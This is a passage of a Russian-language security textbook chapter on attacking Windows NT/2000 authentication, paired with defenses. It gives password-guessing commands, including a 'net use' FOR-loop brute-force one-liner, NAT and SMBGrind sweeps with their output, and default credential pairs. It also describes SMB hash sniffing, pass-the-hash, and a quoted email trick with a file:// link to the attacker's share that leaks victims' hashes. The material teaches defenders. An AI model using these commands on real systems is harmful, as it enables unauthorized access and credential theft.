    Подбор пароля можно также выполнить из командной строки с помощью команды net use. Если вместо пароля в качестве ее параметра указать символ *, то удаленный компьютер попросит ввести пароль, как показано в следующем примере.

    С:\> net use \\192.168.202.44\IPC$ * /user:Administrator
    Type the password for \\192.168.202.44\IPC$:
    The command completed successfully.

    Учетная запись, заданная с помощью ключа /и:, выглядит несколько странно. Напомним, что в NT/2000 учетные записи идентифицируются с использованием идентификаторов защиты SID, состоящих из кортежей компьютер\учетная запись или домен\учетная запись. Если зарегистрироваться в качестве администратора не удалось, попробуйте воспользоваться синтаксисом домен\учетная запись.

    Взломщики, как правило, пытаются подбирать пароли для ставших им известными локальных учетных записей отдельных компьютеров с NT Server или Workstation, а не для глобальных учетных записей, позволяющих получить доступ к контроллеру домена NT. В этом нет ничего удивительного, поскольку очень высока вероятность того, что локальные учетные записи контролируются не так строго, как на уровне всей организации (в этом случае все попытки подбора пароля могут также регистрироваться на контроллере домена). Кроме того, система NT Workstation позволяет любому пользователю регистрироваться в сети после регистрации на самом компьютере (т.е. пользователь Everyone может начать сеанс работы, не входя в сеть (Log on locally), а затем при необходимости подключиться к сети), что значительно упрощает удаленное выполнение команд.
    Конечно, если взломать учетные записи Administrator или Domain Admins главного контроллера домена (РОС — Primary Domain Controller), то в вашем распоряжении окажется весь домен (и все домены, с которыми установлены доверительные отношения). Как правило, стоит выполнить идентификацию контроллера PDS, начать автоматический подбор паролей с помощью "мягких" методов (т.е. позволяющих избежать блокировки учетных записей), а затем сразу же приступить к сканированию всего домена с целью выявления незащищенных жертв (т.е. компьютеров с пустым паролем администратора).

    Если вы собираетесь использовать описываемые приемы для проверки компьютеров в сети вашей компании (конечно, с ведома начальства), не забывайте о блокировании учетных записей, которое может произойти при попытках как ручного, так и автоматизированного подбора паролей. В результате можно настроить против себя не только пользователей всей компании, которые не смогут в течение определенного времени получить доступ к своим компьютерам, но и руководство, которое вряд ли после такого инцидента будет поощрять ваши инициативы в области безопасности.

    Метод подбора наиболее эффективен для выявления паролей, заданных с ошибками, характерными для большинства пользователей. К таким ошибкам можно отнести следующие.

    •  Пользователи всегда стремятся выбрать как можно более простой пароль, в том числе, если это возможно, предпочитают вообще обходится без пароля. По существу, наибольшей брешью в любой сети является пустой или просто подбираемый пароль. Поэтому во время проверки системы безопасности на это нужно обращать самое пристальное внимание.
    •  При выборе пароля пользователи хотят, чтобы его легко было запомнить, и используют для этого пользовательское имя, свое имя или же очевидные строки вида "имя_пользователя", "' имя_компании", "guest", "test", "admin" или "password". Поля комментариев (которые можно увидеть с помощью такого утилиты инвентаризации, DumpACL/DumpSec) учетной записи — это тоже хорошо известное место, в котором можно найти подсказки о пароле и даже сами пароли.
    •  Многие популярные программы функционируют в контексте специальной пользовательской учетной записи. Как правило, имена этих учетных записей широко известны и, что еще хуже, обычно они легко запоминаются. Идентификация подобных широко известных учетных записей во время инвентаризации может предоставить взломщику очень серьезный козырь, значительно облегчающий его задачу при подборе пароля.

    Некоторые примеры стандартных пар "имя пользователя/пароль" представлены в табл. 5.1. Мы называем такие пары наиболее вероятными комбинациями. Кроме того, достаточно большой список паролей, используемых по умолчанию, можно найти по адресу http://www.securityparadigm.соm/defaultpw.htm.

    Таблица 5.1. Наиболee вероятные комбинации "имя пользователя/пароль"

    Имя пользователя
    Пароль
    administrator
    пустой, password, administrator
    arcserve
    arcserve, backup
    test
    test, password
    lab
    lab, password
    имя-пользователя
    имя-пользователя, имя-компании
    backup
    backup
    tivoli
    tivoli
    symbiator
    symbiator, as400
    backupexec
    backup

    Хорошо продуманная стратегия подбора паролей, учитывающая все приведенные выше рекомендации, дает на удивление высокий процент успеха. Однако техника, которая хороша для хакера, подбирающего пароль ради развлечения, вряд ли заинтересует вечно занятого администратора сети, у которого и так хватает забот, чтобы заниматься ручным подбором паролей с целью контроля.
    Автоматизированный подбор паролей очень легко выполнить, реализовав единственный цикл FOR с использованием стандартной команды NET USE системы NT. Во-первых, создайте файл с именами пользователей и паролями на основе наиболее вероятных комбинаций, приведенных в табл. 5.1 (или воспользовавшись собственным перечнем). Такой файл может иметь примерно следующий вид (для разделения значений могут использоваться любые символы-разделители; в данном случае — символы табуляции). Обратите внимание, что пустые пароли в правом столбце не указаны.

    [file: credentials.txt]
    password username
    password Administrator
    admin Administrator
    administrator Administrator
    secret Administrator
    и т.д. . . .

    Теперь этот файл можно подать на вход команде FOR следующим образом:

    C:\>FOR /F "tokens=l,2*" %i in(credentials.txt)do net use
    \\target\\IPC$ %i /u:%j

    Эта команда построчно анализирует файл credentials. txt, выбирает первые две лексемы из каждой строки, а затем использует первую из них в качестве переменной «i (пароль), а вторую — как переменную %i (имя пользователя) при установке соединения с помощью команды net use с совместно используемым ресурсом IРС$ целевого компьютера. Для получения более подробной информации о команде FOR введите в командной проке FOR /?. Эта команда для хакеров NT является одной из наиболее полезных.
    Конечно, имеется много специализированных программ, которые позволяют автоматизировать процессе подбора пароля. В главах 3 и 4 мы уже упоминали программы Legion и NAT (NetBIOS Auditing Tool), которые позволяют автоматизировать процесс подбора пароля. Утилита Legion может не только выполнять сканирование диапазона IP-адресов класса С и выявлять совместно используемые ресурсы. Windows, но и обладает возможностью подбора пароля по заданному словарю.
    Программа NAT предоставляет аналогичные возможности, но позволяет одновременно работать с одним компьютером. Однако, поскольку эта утилита запускается из командной строки, ее использование очень легко автоматизировать. В сценарии или командном файле утилита NAT должна подключаться к очередному узду, а затем подбирать пароль как из предопределенного перечня паролей, так и из списка, подготовленного пользователем. Одним из недостатков NAT является то, что как только эта угилита обнаруживает пароль, соответствующий какой-то из учетных записей, она тут же использует эту пару для подключения. Тем самым остальные возможные пароли других учетных записей остаются неизвестными. Ниже приведен пример простого цикла FOR, с помощью которого организуется перебор всех компьютеров сети класса С (Для краткости листинг был отредактирован).

    D:\>FOR /L %i IN (1,1,254) DO nat -u
    userlist.txt -p passlist.txt
    "92.163.202.»! » nat_output.txt
    [*]--- Checking host: 192.168.202.1
    [*]--- Obtaining list of remote NetBIOS names
    [*]--- Attempting to connect with Username:
    'ADMINISTRATOR'Password:
    'ADMINISTRATOR'
    [*]--- Attempting to connect with Username:
    'ADMINISTRATOR'Password:
    'GUEST'
    ...
    [*]--- CONNECTED: Username:
    'ADMINISTRATOR' Password:
    'PASSWORD'
    [*]--- Attempting to access share:
    \\*SMBSERVER\TEMP
    [*]-—- WARNING: Able to access share:
    \\*SM3SERVER\TEMP
    [*]--- Checking write access in:
    \\*SMBSERVER\TEMP
    [*]--- WARNING: Directory is writeable:
    \\*SM3SERVER\TEMP
    [*]--- Attempting to exercise ..
    bug on: \\*SMBSERVER\TEMP

    Еще одним хорошим инструментом обнаружения паролей является утилита NTInfoScan (NT'S) Дэвида Литчфилда (David Litchfield), который известен также под псевдонимом Mnemonix. Эту утилиту можно найти по адресу http://packetstorm.stcurify.com/NT/audit/. NTIS — это простая утилита командной строки, которая выполняет проверку по протоколам Internet и NetBIOS, а результат выводит в файл HTML-формат. Она также осуществляет все необходимые операции по инвентаризации пользователи ;г в конце отчета помещает учетные записи с пустым паролем. В настоящее время утилита NTFS обновлена и распространяется новой компанией Дэвида, Cerberus Information Security. Теперь эта утилита называется Cerberus Internet Scanner (CIS) и снабжена графическим интерфейсом.
    Все упомянутые выше утилиты распространяются бесплатно и, в общем, прекрасно справляются с возложенной на них задачей. Если же вам нужны дополнительные возможности, предоставляемые коммерческими пакетами, рекомендуем обратить внимание на пакет CyberCop Scanner от компании Network Associates Inc. (NAI). в состав которого входит утилита SMBGrind. Эта утилита отличается поразительной скоростью работы, поскольку она одновременно запускает сразу несколько процессов подбора пароля. Во всем остальном она практически не отличается от утилиты NAT. Ниже приведен пример результатов работы утилиты SMBGrind. Параметр -1 определяет количество одновременных соединений, т.е. количество параллельно запускаемых процессов.

    D:\> smbgrind -I 100 -i 192.168.2.5
    Host address: 192.168.2.5
    Cracking host 192.168.2.5 (*SMBSERVER)
    Parallel Grinders: 100
    Percent complete: 0
    Percent complete: 25
    Percent complete: 50
    Percent complete: 75
    Percent complete: 99
    Guessed: testuser Password: testuser
    Percent complete: 100
    Grinding, complete, guessed 1 accounts

    Контрмеры: защита от подбора пароля



    Существует несколько защитных мер, которые могут сделать невозможными или. по крайней мере, затруднить попытки подбора пароля. Первая из них поможет в тех случаях, когда компьютер с системой NT. непосредственно подключенный к Internet, не должен отвечать на запросы о совместно используемых ресурсах Windows. Для этого нужно заблокировать доступ к портам TCP и UDP с номерами 135-139 на пограничном брандмауэре или маршрутизаторе, а также запретить привязку WINS Client (TCP/IP) для любого адаптера, подключенного к внешней сети, как показано на приведенной ниже иллюстрации.
    Это позволит запретить использование портов NetBIOS соответствующим сетевым адаптером. Для узлов с двумя сетевыми адаптерами (dual-homed host) необходимо запретить поддержку протокола NetBIOS на адаптере, подключенном к Internet, и оставить ее на сетевом адаптере внутренней сети. чтобы к совместным ресурсам Windows могли обращаться легальные пользователи. (При отключении поддержки NetBIOS с использованием этого метода, внешний порт остается в режиме ожидания, однако он не будет отвечать на запросы.)


    В системе Windows 2000 для запрещения использования протокола NetBIOS поверх TCP/IP для каждого адаптера в отдельности можно использовать спе.{и-:;ль ный пользовательский интерфейс. Однако, как вы увидите из главы 6, такая возможность вовсе не является панацеей, и отключение адаптеров от совместно используемых файлов и принтеров является гораздо лучшим способом.

    Если ваши компьютеры с системой NT выполняют роль файловых серверов и, как следствие, должны обеспечивать возможность подключения, данных мер, естественно, будет недостаточно, поскольку они будут блокировать или даже запрещать все подобные службы. В таких случаях необходимо применять более традиционные меры: блокировать учетные записи после определенного количества неудачных попыток регистрации, реализовать политику строгого выбора паролей, а также регистрировать все неудачные попытки регистрации. К счастью, для выполнения этих задач компания Microsoft предоставляет все необходимые средства.

    Политика учетных записей



    Одним из таких средств является утилита User Manager. Для задания политики учетных записей выберите в диалоговом окне диспетчера пользователей команду Policies>Account. В появившемся диалоговом окне можно задать определенную политику назначения паролей, например установить ограничение на минимальную длину пароля или потребовать, чтобы пароли не повторялись чаще определенного количества раз. Кроме того, в диалоговом окне Account Policy можно установить блокировку соответствующей учетной записи после заданного количества неудачных попыток регистрации. Диспетчер пользователей также позволяет администраторам принудительно отключать пользователей после завершения установленной длительности сеанса. Это очень удобная возможность, позволяющая "перекрыть кислород" непрошеным ночным гостям.


    Подчеркнем еще раз, что каждый, кто намеревается попробовать "на прочность" пароли как с помощью описанных в данной главе методов ручного, так и автоматического подбора, должен помнить о возможностях блокировки учетных записей.

    Passfilt



    Еще больший уровень защиты можно обеспечить с помощью динамически подключаемой библиотеки Passfilt, входящей в состав Service Pack 2. Для того чтобы она была подключена к системе защиты, необходимо проделать процедуру, описанную в статье Q161990 базы знаний Microsoft Knowledge Base. Данная библиотека позволяет поддерживать жесткую политику выбора паролей, которая гарантирует защиту не только от взлома, но и от ленивого пользователя, выбирающего слишком простой пароль. После установки библиотеки Passfilt все пароли должны состоять не менее чем из шести символов, не могут совпадать с именами учетных записей или быть частью полного имени пользователя, а также должны состоять из символов, которые выбираются как минимум из трех следующих групп.

    •  Буквы английского алфавита в верхнем регистре (А, в, с, ..., Z)
    •  Буквы английского алфавита в нижнем регистре (а, b, с, ..., z)
    •  Арабские цифры (0, 1, 2, ..., 9)
    •  Символы, не являющиеся алфавитно-цифровыми (@, #, !, & и т.д.)

    Библиотека Passfilt должна быть под рукой у каждого серьезного администратора NT, однако нужно отметить два ее ограничения. Первое состоит в жесткой установке минимальной длины пароля в 6 символов. Мы рекомендуем наложить более строгое ограничение в 7 символов в диалоговом окне Account Policy диспетчера пользователей. (Почему так важна разница в один символ, вы узнаете ниже при рассмотрении процесса взлома пароля NT.) Во-вторых, библиотека Passfilt вызывается лишь в том случае, когда решение об изменении пароля принимает сам пользователь. Если же пароль меняется администратором с помощью диспетчера пользователей, то выполнение требований Passfilt не гарантируется (см. статью Q174075). Для того чтобы обеспечить более строгое следование принятой политике учетных записей, можно разработать свою собственную библиотеку Passfilt. Учтите, что при таком подходе в качестве библиотеки Passfilt можно легко "получить в подарок" "троянского коня". Так что при выборе библиотек от сторонних производителей будьте очень внимательны.

    Библиотека Passfilt в системе Win 2000 устанавливается по умолчанию, однако остается неактивной. Для того чтобы ее активизировать, воспользуйтесь консолью secpol.msc или gpedit.msc и активизируйте режим Passwords must meet complexity requirements, относящийся к элементу консоли Security Configuration and Analysis\Account Policies\Password Policy.

    Passprop



    Еще одним важным дополнительным средством, которое входит в состав NT Resource Kit (NTRK) является утилита Passprop, которая позволяет применить к учетным записям домена NT два следующих требования.

    •  Пароли, выбираемые пользователями, должны обязательно содержать алфавитные символы как в верхнем, так и в нижнем регистрах или же состоять из символов и цифр.
    •  Второе требование касается учетной записи Administrator. Как мы уже говорили, эта учетная запись является наилучшим трофеем удачливого взломщика, представляющим собой серьезную опасность для безопасности. К сожалению, исходную встроенную учетную запись Administrator (RID 500) в системе NT заблокировать нельзя, что позволяет взломщикам легко ее идентифицировать и бесконечно долго пытаться подобрать к ней пароль. Утилита Passprop удаляет используемые по умолчанию ограничения NT на блокировку учетной записи администратора. (Учетную запись Administrator можно всегда разблокировать с локальной консоли сервера, что предотвращает попытки спровоцировать состояние DoS.)

    Для того чтобы наложить на систему безопасности оба требования, необходимо установить пакет NTRK (или просто скопировать файл passprop.exe, если установка всего пакета NTRK связана с вопросами защиты) и ввести следующую команду в командной строке: passprop /complex /adminlockout
    Для того чтобы вернуть систему в исходное состояние, необходимо запустить утилиту с параметром /noadminlockout.

    Аудит и регистрация событий



    Даже если никому и не удастся проникнуть в вашу сеть с помощью подбора пароля, так как вы установили библиотеку Passfilt или воспользовались утилитой Passprop, все равно имеет смысл отслеживать все неудачные попытки регистрации. Для этого выберите команду Policies>Audit в диалоговом окне диспетчера пользователей. При этом на экране появится диалоговое окно Audit Policy, представленное ниже.
    Журнал безопасности (Security Log), заполненный событиями с идентификаторами 529 или 539 (Logon/Logoff failure и Account Locked Out соответственно), свидетельствует о том, что система подвергается попытке автоматизированного взлома. В большинстве случае журнал позволяет даже установить компьютер, с которого производятся попытки взлома. На рис. 5.1 показано содержимое журнала безопасности после многочисленных неудачных попыток регистрации, предпринятых с помощью утилиты NAT.
    Вот подробные сведения о событии с идентификатором 539.
    Естественно, регистрация событий ничего не стоит, если не выполняется анализ журналов. Анализировать журналы вручную очень утомительно. К счастью, утилита Event Viewer позволяет фильтровать записи о событиях по дате, типу, источнику, категории, пользователю, компьютеру и идентификатору события.




    Рис. 5.1. Журнал безопасности с зарегистрированными неудачными попытками регистрации в сети, выполнявшимися с использованием утилиты NAT

    Если для управления журналами и их анализа вам требуется надежная утилита командной строки, позволяющая автоматизировать ее использование, обратите внимание на утилиту dumpel из пакета NTRK, NTLast компании NTObjectives (по адресу http://www.ntobjectives.com можно найти как бесплатно распространяемую, так и коммерческую версию) или DumpEvt от компании Somarsoft (бесплатную версию утилиты можно найти по адресу http://www.somarsoft.com).
    Утилита dumpel может обрабатывать журнал событий с удаленного сервера (при наличии соответствующих разрешений) и отфильтровывать до десяти идентификаторов событий одновременно. Например, с помощью dumpel можно извлечь неудачные попытки регистрации на локальном компьютере (событие 529). Для этого в командной строке нужно ввести следующую команду. С:\> dumpel -е 529 -f seclog.txt -1 security -m Security -t
    Утилита DumpEvt позволяет преобразовать весь журнал безопасности в формат, пригодный для импорта в базу данных Access или SQL. Однако эта утилита не предоставляет средств фильтрации событий.
    NTLast — это утилита командной строки Win32, которая выполняет поиск в локальных и удаленных журналах записей об интерактивных (interactive), удаленных (remote) и неудачных (fail) попытках регистрации. Кроме того, с ее помощью можно найти соответствующие друг другу пары событий регистрации/завершения сеанса (logon/logoff) для заданной учетной записи. Коммерческая версия утилиты NTLast позволяет также извлекать записи о неудачных попытках использования пароля для получения доступа к серверу IIS.

    Выявление вторжений в реальном времени



    После применения средств анализа журналов следующим этапом является реализация механизма оповещения о возможных нарушениях в реальном времени. Количество программных продуктов из так называемой категории систем выявления вторжений быстро возрастает, особенно для использования на платформе NT. Системы выявления вторжений, предназначенные для использования на компьютерах под управлением системы NT, представлены в табл. 5.2.
    Функциональные возможности этих продуктов варьируются в широком диапазоне, от простых средств анализа журналов, генерации оповещений (KSM) и мониторинга попыток взлома на уровне сетевого протокола (RealSecure) до полноценных систем выявления вторжений на уровне узла (Centrax). Так что при выборе той или иной системы внимательно ознакомьтесь с перечнем ее возможностей и выясните, сможет ли она решать возлагаемые на нее задачи.

    Таблица 5.2. Некоторые системы выявления вторжений для систем NT/2000

    Система выявления вторжений
    Разработчик
    BlackICE Pro
    Network ICE Corp.
    http://www.netice.com/
    Centrax
    Cybersafe Corp.
    http://www.cybersafe.com/
    CyberCop Server
    Network Associates, Inc.
    http://www.nai.com/
    Desktop Sentry
    NTObjectives
    http://www.nt objectives.com
    Intact
    Pedestal Software
    http: //www.pedestalsoftware.com/
    Intruder Alert (ITA)
    AXENT Technologies, Inc.
    http://www.axent.com
    Kane Security Monitor (KSM)
    Security Dynamics Technologies Inc.
    http://www.securitydynamics.com/
    RealSecure
    Internet Security Systems
    http://www.iss.net
    SeNTry
    Mission Critical
    http://www.miss ioncritical.com
    SessionWall-3
    Computer Associates/Platinum Technology 
    http://www.platinum.com/
    Tripwire for NT
    Tripwire, Inc.
    http://www.tripwiresecurity.com/

    К сожалению, обсуждение вопросов, связанных с выявлением вторжений, выходит за рамки данной кн7иги. Можем лишь подчеркнуть, что администраторы сети, обеспокоенные вопросами обеспечения безопасности, должны уделять этой технологии самое пристальное внимание — что может быть важнее, чем вовремя поступивший сигнал о возникшей в сети проблеме? Более подробная информация о выявлении вторжений, в том числе и сравнительные характеристики лучших программных продуктов этой категории, в настоящее время содержится в статье http://www.infoworld.com/cgi-bin/displayTC.pl7980504comp.htm.
    Подбор пароля — это нелегкая задача. Почему бы просто не перехватить ценную информацию при регистрации пользователей на сервере, а затем использовать ее по своему усмотрению? В тех редких случаях, когда взломщику удается перехватить обмен регистрационными данными, такой подход позволяет сэкономить значительную часть усилий, которые требуются в процессе подбора пароля. Для этого подойдут
    многие из уже рассмотренных утилит, однако можно воспользоваться и другим средством, специально предназначенным для этих целей. С такой утилитой вы уже хорошо знакомы: l0phtcrack, которую можно найти по адресу http: //www.10pht.com.

    Перехват паролей, передаваемых по сети



    Утилита l0phtcrack предназначена для подбора паролей NT, которая обычно используется для автономного взлома перехваченной базы данных паролей, т.е. без соединения с сервером. Такой подход позволяет, во-первых, не беспокоиться о возможной блокировке учетных записей при попытках подбора пароля, а во-вторых, организовать перебор сколь угодно большого количества вариантов. Получение файла паролей - довольно нетривиальная задача, поэтому этот вопрос, а также методы использования утилиты l0phtcrack более подробно будут рассмотрены в разделе "Взлом Паролей Nt".
    В последних версиях l0phtcrack имеется функция SMB Packet Capture, которая ранее была реализована в виде отдельной утилиты readsmb. С использованием этой функции можно обойтись без перехвата файла паролей, а вместо этого прослушать локальный сегмент сети, перехватить запросы на регистрацию, которыми обмениваются системы NT, а затем выбрать из них информацию о зашифрованных паролях. Затем выполняется алгоритм расшифровки, обратный тому, который используется при шифровании паролей в системе NT (этот процесс и называется взломом — cracking). На рис. 5.2 показан пример использования функции SMP Packet Capture для перехвата пересылаемых по сети паролей для их последующего взлома самой утилитой l0phtcrack.
    Некоторые читатели могут удивленно воскликнуть: ''Подождите. Разве в NT не реализован принцип аутентификации по запросу?" Это действительно так. В процессе аутентификации клиенты получают случайный запрос от сервера, который кодируется с помощью хэш-кода пароля пользователя в качестве ключа и в зашифрованном виде передается назад по сети. Затем сервер зашифровывает запрос с помощью своей собственной копии хэш-кода пароля пользователя (взятой из SAM-файла) и сравнивает его с полученным значением. Если значения совпадают, то процесс регистрации завершается успешно (более подробная информация о процессе аутентификации содержится в разделе Q102716 базы знаний). Значит, сам хэш-код пароля даже не передается по сети. Возникает вопрос: как в таком случае утилита l0phtcrack может его взломать?
    Очень просто, путем подбора в лоб. Из заголовка пакета утилита l0phtcrack получает только сам запрос и запрос, закодированный с помощью хэш-кода пароля. Затем выполняется кодирование известного значения запроса с помощью случайно генерируемых строк и результат сравнивается с полученным зашифрованным значением запроса. Эта процедура повторяется до тех пор, пока не будет найдена случайная строка, для которой результаты окажутся идентичными. Из-за несовершенства алгоритма вычисления хэш-кода LM (на самом деле этот хэш-код состоит из трех фрагментов, которые можно атаковать независимо друг от друга), процесс подбора занимает гораздо меньше времени, чем кажется на первый взгляд. Более подробная информация об этом содержится по адресу http: //www.10pht.com/10phtcrack/rant .html.
    Эффективность утилиты l0phtcrack при ее совместном использовании с функцией SMP Packet Capture настолько высока, что любой, кто не пожалеет времени для наблюдения за сетью, гарантированно сможет получить статус администратора в течение нескольких дней. Вы замечаете, как неумолимо бежит время?
    Даже если вы считаете, что вашу сеть защитит коммутируемая архитектура, не торопитесь с выводами. Например, взломщик может воспользоваться одним из методов социальной инженерии, описание которого можно найти в ответах на часто задаваемые вопросы (FAQ — Frequently Asked Questions) по использованию утилиты l0phtcrack (http://www.l0pht.com/l0phtcrack/faq.html).



    Рис. 5.2. Функция SMP Packet Capture утилиты lOphtcrack позволяет перехватывать пересылаемые по сети NT запросы на регистрацию для их последующего взлома с помощью lOphtcrack. В данном примере видно несколько систем, у которых значение NT Hash представлено нулями. Это означает, что данные системы работают под управ-,- лением Win 9x, которая не поддерживает алгоритма хэширования NT

    "Отправьте выбранной жертве почтовое сообщение (неважно, на личный адрес или же на общий адрес компании). В текст письма включите адрес URL в форме file:////ваш_компьютер/имя_совместно_ используемого_ресурса/сообщение.html. Как только получатель щелкнет на этом URL, его хэшированный пароль сразу же будет отправлен вам для аутентификации."

    При знакомстве с технологиями, подобными протоколу ARP (см. главу 10), вы увидите, что коммутируемые сети на самом деле не обеспечивают надежную защиту против перехвата паролей.

    Мастаки из LOpht даже умудрились смастерить утилиту, которая выуживает хэши-рованные пароли NT из потока данных, которыми обмениваются компьютеры при регистрации с использованием протокола РРТР (Point-to-Point Tunneling Protocol). В системе NT адаптированный вариант РРТР используется для организации частных виртуальных сетей (VPN — Virtual Private Network). Эта технология позволяет организовывать туннелирование потока данных для передачи информации по Internet с гарантированной защитой. По адресу http://www.l0pht.com/10phtcrack/donwload.html можно найти два анализатора сетевых пакетов: одна программа предназначена для работы в системе Solaris 2.4+ (написана L0pht), а вторая (ее автор — модератор бюллетеня Bugtrag, хакер Aleph One (Алеф Ван)) — в любой сети UNIX, в которой имеется библиотека перехвата пакетов libpcap. Кроме того, на этой же Web-странице имеется версия программы readsmb для UNIX, написанная Йоше Чангом (Jose Chung) из компании Basement Research.
    Если каким-то образом вам удалось завладеть пользовательским хэш-кодом (скажем, в результате перехвата пакетов SMB или копирования базы данных SAM системы NT), то почему бы не передать этот хэш-код прямо в операционную систему клиента, которая, в свою очередь, сможет использовать его при ответе на запрос в процессе аутентификации. Таким образом взломщик может пройти процедуру регистрации на сервере даже без знания пароля в явной форме, а лишь обладая нужным хэш-кодом и именем пользователя. Такой подход позволяет сэкономить много времени и сил, затрачиваемых на извлечение хэш-кода с помощью перехвата SMB-пакетов.

     Передача хэш-кода



    Пол Эштон (Paul Ashton) выдвинул идею модификации SMB-клиента сервера Samba системы UNIX, обеспечивающего совместный доступ к файлам (http://www.saniba.org) с целью реализации описанного выше приема. Исходный документ Пола можно найти в архивах бюллетеня NT Bugtraq по адресу http://www.ntbugtraq.com. Новые версии программы smbclient для системы UNIX позволяют зарегистрироваться на клиентских системах NT с использованием лишь хэш-кода.
    Технические подробности процесса передачи хэш-кода содержатся в статье Гернана Очоа (Heman Ochoa) из компании CORE-SDI. Из этой статьи можно узнать, как подсистема LSASS (Local Security Authority Subsystem) хранит информацию о сеансах регистрации и связанных с ними данными учетных записей. Гернан показал, как напрямую отредактировать эти данные в оперативной памяти и изменить регистрационную информацию незаметно для пользователя. Подтверждением работоспособности такого подхода может послужить рис. 5.3 (для обеспечения безопасности реальные имена были изменены).
    Однако подобные подходы не получили широкого распространения, поскольку справиться с данной задачей могут лишь программисты довольно высокой квалификации. Таким образом, риск атаки, основанной на отправке хэш-кода, невысок.



    Рис. 5.3. Программа, предназначенная для отправки хэш-кода

    Контрмеры: запрещение аутентификации в локальной сети



    В сервисном пакете Service Pack 4.0 была добавлена поддержка нового параметра системного реестра, призванного запретить узлу NT выполнять аутентификацию в локальной сети (с использованием хэш-кодов LM). Для того чтобы воспользоваться этой возможностью, нужно добавить параметр LMCompatibilityLevel со значением REG_DWCRD=4 к следующему ключу системного реестра. HKEY_LOCAL_MACHINE\System\CurrentControlSet\LSA
    Значение 4 запрещает контроллеру домена (DC — domain controller) принимать запросы на аутентификацию. Как объясняется в статье Q147706 базы знаний компании Microsoft, значения 4 и 5 зарезервированы для контроллеров доменов.
    К сожалению, любые клиенты низкого уровня не смогут пройти аутентификацию на контроллере домена, на котором установлен пакет Service Pack 4 и выполнены описанные выше действия (например, такими клиентами являются системы Windows 9x, Windows for Workgroups). Это объясняется тем, что модернизированная система аутентификации такого контроллера будет выполнять аутентификацию лишь с использованием кэш-кода NT. Более того, поскольку клиенты, не использующие систему Windows NT, не могут реализовать вычисление хэш-кода NT, они все равно будут отправлять по сети запросы на аутентификацию, содержащие значения хэш-кодов LM. Это сведет на нет все усилия, напрашгенные на защиту от перехвата SMB-пакетов. Вывод напрашивается сам собой: в составе домена не должно быть клиентских компьютеров, работающих под управлением старых версий Windows. Однако в большинстве компаний, использующих в сети системы с различными версиями Windows, такое решение вряд ли можно воплотить в жизнь.

    До появления сервисного пакета SP4 не было возможности запретить обработку хэш-кодов LМ на узле NT, используемых для аутентификации. Как следствие, такие узлы абсолютно не защищены от опасности перехвата SMB-пакетов.

    С выходом новой операционной системы Win 2000 компания Microsoft предоставила другую возможность передачи регистрационных данных по локальной сети клиентами Win Эх. Ее предоставляет клиент службы каталогов (DSClient — Directory Services Client), который можно найти на установочном компакт-диске системы Windows 2000 в папке Clients\win9x (файл Dsclient.exe). Теоретически пользователи Win 9x могут установить специальные параметры системного реестра и использовать более надежную защиту благодаря использованию хэш-кодов NT. В статье Q239869 описывается, как установить программу DSClient и настроить клиентов Win 9л: для использования протокола идентификации NTLM версии 2.

    Использование подписи SМВ



    Хотя полностью защититься от атак с использованием хэш-кодов нельзя, можно наложить некоторые ограничения на удаленную регистрацию в системе Windows с помощью подписи SMB (SMB signing). Такая возможность появится в системе NT, если на ней установить сервисный пакет SP3 или более поздний. Здесь мы упоминаем этот механизм исключительно для обеспечения полноты изложения. При использовании подписи SMB каждый пакет 8MB, передаваемый правильно настроенными клиентами и серверами NT, будет проверяться с применением криптографических методов. Это позволит предотвратить вставку в поток данных регистрации пакетов взломщика. Как и ранее, это решение годится только для Windows NT, так как клиенты Win 9x не поддерживают описанный выше механизм. Кроме того, как отмечается в статье Q161372 базы знаний Microsoft, посвященной режиму использования подписи SMB, активизация этого средства влечет за собой снижение производительности на 10-15 %.


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    7.gif

    Изображение: 

    6. Удаленное проникновение: состояние DoS и переполнение буфера



    Удаленное проникновение: состояние DoS и переполнение буфера


    В этом разделе мы немного поговорим о том, как может разворачиваться ситуация в том случае, если взломщику не удастся подобрать пароль к интересующей его системе. В таких случаях у него есть несколько возможностей. Первая из них состоит в поиске скрытого недостатка архитектуры NT, которым можно было бы воспользоваться для удаленного проникновения и получения доступа к системе. Вторая заключается в генерации состояния DoS (DoS — отказ в обслуживании), — последней надежды неудачливого взломщика.

    Удаленное переполнение буфера



    О Windows NT ходят легенды, что в ней существуют многочисленные секретные "лазейки", с помощью которых можно получить статус администратора любой удаленной системы. На самом деле в настоящее время известно лишь несколько подобных недостатков, которые при определенных условиях могут дать подобный эффект, однако все они относятся к приложениям, а не к самой системе Windows NT. Чем это объясняется, то ли относительной "молодостью" NT, то ли архитектурой, заложенной в нее разработчиками Microsoft, — это спорный вопрос.
    С точки зрения удаленного проникновения самые тяжелые последствия способна вызвать ошибка переполнения буфера (buffer overflow). Более подробно переполнение буфера будет рассматриваться в главе 14, а сейчас для продолжения обсуждения достаточно сказать, что переполнение буфера возникает тогда, когда программы не способны адекватно отслеживать длину вводимых данных. В таких случаях избыточные данные записываются поверх части стека центрального процессора. Если это произойдет не случайно, а в результате передачи в качестве избыточных данных соответствующих команд, то новый код может привести к выполнению операций, подобранных высококвалифицированным программистом. Одной из наиболее значимых статей, посвященных проблеме переполнения буфера, является работа Алефа Вана (Aleph One) Smashing the stack for fan and profit. Ее можно найти по адресу http://phrack.infonexus.com/archive.html. К другим статьям о переполнении буфера системы Windows относятся Tao of Windows Buffer Overflow хакера Дилдога (Dildog), Win32 Buffer Overflows Барнаби Джека (Barnaby Jack) в Phrack 55, а также статьи членов группы CIS (Cerberus Information Security).
    Переполнение буфера можно отнести к одному из двух основных классов: удаленное и локальное. Для достижения локального переполнения требуется доступ к консоли, и его обычно могут осуществить лишь интерактивные пользователи. Удаленное переполнение буфера является гораздо более опасным. Такой возможностью могут воспользоваться взломщики, имеющие нулевые привилегии на целевом компьютере и находящиеся на любом узле сети. Как правило, удаленное переполнение буфера связано с размещением на целевой системе "полезного груза" (т.е. кода, помещенного в стек центрального процессора), что впоследствии позволяет взломщику удовлетворить практически любые свои желания. В табл. 5.3 приведены некоторые наиболее известные публикации об ошибках переполнения буфера системы NT и других программных продуктов компании Microsoft.
